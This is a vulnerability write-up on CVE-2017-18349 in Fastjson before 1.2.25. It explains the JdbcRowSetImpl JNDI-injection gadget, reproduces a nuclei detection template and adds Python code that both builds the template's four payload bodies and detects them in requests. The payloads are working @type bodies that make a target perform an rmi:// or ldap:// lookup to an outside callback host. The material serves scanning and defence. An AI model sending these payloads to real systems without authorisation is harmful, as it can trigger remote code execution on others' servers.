Fastjson Deserialization Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: Fastjson Deserialization Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2017-18349

Vulnerability type: Deserialization

Severity: Critical

Description: Fastjson is Alibaba's open-source, high-performance JSON library, widely used for JSON serialization and deserialization in Java applications, especially in web and server-side code.

The flaw affects Fastjson versions before 1.2.25 and lies in how parseObject handles the special @type key (a JSON key, not a Java annotation). When a JSON object carries @type, Fastjson instantiates the named class and passes the remaining members to its setters (the autoType feature), and versions before 1.2.25 did not validate or restrict that class name at all, so an attacker can name any class on the classpath. The classic gadget is the JDK's own com.sun.rowset.JdbcRowSetImpl: setDataSourceName stores a JNDI name, and setAutoCommit(true) calls connect(), which performs an InitialContext.lookup() on it. Supplying an attacker-controlled rmi:// or ldap:// URI as dataSourceName therefore turns the parse into a JNDI injection, and, where the JVM still loads remote codebases, into remote code execution. One caveat for verification: that remote-class-loading leg depends on the JDK (com.sun.jndi.rmi.object.trustURLCodebase defaults to false from 8u121 and the LDAP counterpart from 8u191), so on newer runtimes exploitation additionally needs a deserialization gadget delivered through the LDAP response; the unsafe autoType behaviour in Fastjson itself is the same either way. The 1.2.25 release introduced checkAutoType with a class-name denylist and an autoTypeSupport switch that is off by default.

An attacker who successfully exploits this runs arbitrary code on the target system, which means full control of the host, access to its data and the ability to plant a persistent backdoor. The bug is reachable over the network with no authentication of any kind: a single crafted JSON body sent to any endpoint that hands its input to a vulnerable Fastjson version is enough to trigger it. That makes it well suited to automated, large-scale exploitation and a serious threat to every application that embeds an affected version.

Vendor: alibaba

Product: fastjson

Affected versions: version < 1.2.25

Source: https://github.com/projectdiscovery/nuclei-templates/blob/1aaaa356aeaef6348f0062b40e674fc67b0cd5ae/http%2Fcves%2F2017%2FCVE-2017-18349.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details

The nuclei template below posts the JdbcRowSetImpl gadget with a dataSourceName pointing at an interactsh callback, over rmi:// and ldap://, both as the top-level object and nested under a wrapper key (applications commonly wrap input, and Fastjson honours @type at any depth). A match is an out-of-band interaction from the target; what usually registers is the DNS resolution of the callback host when the JNDI lookup is attempted. That confirms untrusted @type reaches Fastjson and the gadget class is loadable; it does not by itself prove that code executed, and the template is tagged intrusive because the lookup really runs inside the target JVM.


id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    Fastjson before 1.2.25 contains a remote code execution vulnerability in parseObject method.
    The vulnerability allows remote attackers to execute arbitrary code via crafted JSON requests
    containing malicious @type annotations that trigger unsafe deserialization of JdbcRowSetImpl.
    This affects FastjsonEngine in Pippo 1.11.0 and other products using vulnerable Fastjson versions.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution,
    enabling attackers to execute arbitrary commands, access sensitive data, and establish
    persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.
    Implement additional security measures: disable autotype functionality by setting fastjson.parser.autoTypeSupport=false,
    implement strict whitelist filtering for @type annotations, validate and sanitize all JSON input,
    use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies
    for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with
    secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-502
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
    epss-score: 0.97435
    epss-percentile: 0.99951
  metadata:
    verified: true
    max-request: 4
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,critical,intrusive

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request

  - method: POST
    path:
      - "{{BaseURL}}/json"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request
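The four request bodies the template above sends, rebuilt offline, together with a body inspector for the defensive side of the same mechanism described in the vulnerability description (the @type key honoured at any depth of the object tree). This is an added example, not code from this page or from the nuclei project; the callback host name, the /x path suffix, the ldaps:// scheme and all function names are assumptions introduced here.

```python
import json
from typing import Any, Iterator, List, Optional, Tuple

# Gadget class used by the template: instantiating it through @type calls
# setDataSourceName() and setAutoCommit(true); the latter runs connect(),
# which performs a JNDI InitialContext.lookup() on dataSourceName.
GADGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"

# URI schemes that turn that lookup into JNDI injection. rmi:// and ldap://
# are the ones the template uses; ldaps:// is added here as an assumption.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://")


def build_body(callback_host: str, scheme: str = "rmi",
               wrapper_key: Optional[str] = None) -> str:
    """Build one request body in the shape the template sends.

    wrapper_key=None gives the top-level form; a key such as "data" or "b"
    gives the nested form, which matters because fastjson honours @type at
    any depth of the object tree. Host and "/x" suffix are assumptions.
    """
    gadget = {
        "@type": GADGET_CLASS,
        "dataSourceName": f"{scheme}://{callback_host}/x",
        "autoCommit": True,
    }
    body = gadget if wrapper_key is None else {wrapper_key: gadget}
    return json.dumps(body)


def template_bodies(callback_host: str) -> List[str]:
    """The four body variants the template above sends, in template order."""
    return [
        build_body(callback_host, "rmi"),
        build_body(callback_host, "ldap"),
        build_body(callback_host, "rmi", "data"),
        build_body(callback_host, "ldap", "b"),
    ]


def _walk(node: Any, path: str = "$") -> Iterator[Tuple[str, dict]]:
    """Yield (json-path, object) for every JSON object in a parsed tree."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")


def find_autotype(body: str) -> List[dict]:
    """Report every object in the body that carries an @type key.

    The body is parsed first, so escaped spellings such as "\\u0040type"
    (which fastjson decodes to "@type" as well) cannot slip past a plain
    substring grep. Input that is not JSON yields no findings.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    findings = []
    for path, obj in _walk(doc):
        if "@type" not in obj:
            continue
        cls = str(obj["@type"])
        dsn = str(obj.get("dataSourceName", ""))
        findings.append({
            "path": path,
            "class": cls,
            "gadget": cls == GADGET_CLASS,
            "jndi": dsn.lower().startswith(JNDI_SCHEMES),
        })
    return findings


def is_exploit_attempt(body: str) -> bool:
    """True when the JdbcRowSetImpl gadget is combined with a JNDI URI."""
    return any(f["gadget"] and f["jndi"] for f in find_autotype(body))


if __name__ == "__main__":
    for body in template_bodies("oast.example"):
        print(is_exploit_attempt(body), body)
```

The inspector deliberately walks the parsed tree instead of grepping the raw body: the template itself already nests the gadget under "data" and "b", and Fastjson accepts unicode-escaped keys, so a WAF rule keyed on the literal string "@type" misses both cases. It is a triage aid for request logs and a pre-parse guard, not a substitute for upgrading past 1.2.25 and keeping autoTypeSupport off.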




http://example.com/2025/07/19/github_2527350312/
Author
lianccc
Published
July 19, 2025